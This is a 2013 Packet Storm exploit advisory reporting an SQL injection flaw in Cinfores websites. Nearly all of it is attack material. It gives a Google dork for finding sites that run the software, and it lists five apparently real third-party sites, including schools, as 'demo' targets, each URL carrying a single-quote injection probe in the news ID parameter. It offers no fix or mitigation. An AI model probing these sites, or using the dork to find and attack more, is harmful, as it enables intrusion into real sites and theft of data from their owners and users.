Cinfores SQL Injection

2013-09-12T00:00:00
ID PACKETSTORM:123206
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-09-12T00:00:00

Description

                                        
                                            `|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
|-------------------------------------------------------------------------|  
| [/] Exploit Title: Cinfores Sql Injection Vulnerability  
|  
| [\] Exploit Author: Ashiyane Digital Security Team  
|  
| [/] Softeare Link : http://www.cinfores.com  
|  
| [\] Google Dork: intext:"Powered by Cinfores"  
|  
| [\] Tested on: Windows,Linux  
|-------------------------------------------------------------------------|  
| [/] Exploit: all websites Sql Injection  
|-------------------------------------------------------------------------|  
| [/] Demo site:  
| [\] http://www.abeconline.com/new_abec1/news_content.php?idx='  
| [/] http://www.ndssonline.com/new_ndss/news_content.php?idx='  
| [\] http://www.emaridonline.com/new_emarid/news_content.php?newsidx='  
| [/] http://www.misph.sch.ng/goldspring/news_content.asp?newsid='  
| [\] http://staffschool.ust.edu.ng/new_staffschool/news_content.php?idx='  
|-------------------------------------------------------------------------|  
| [/]Discovered By :ACC3SS  
|-------------------------------------------------------------------------|  
|-------------------------------------------------------------------------|  
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|  
`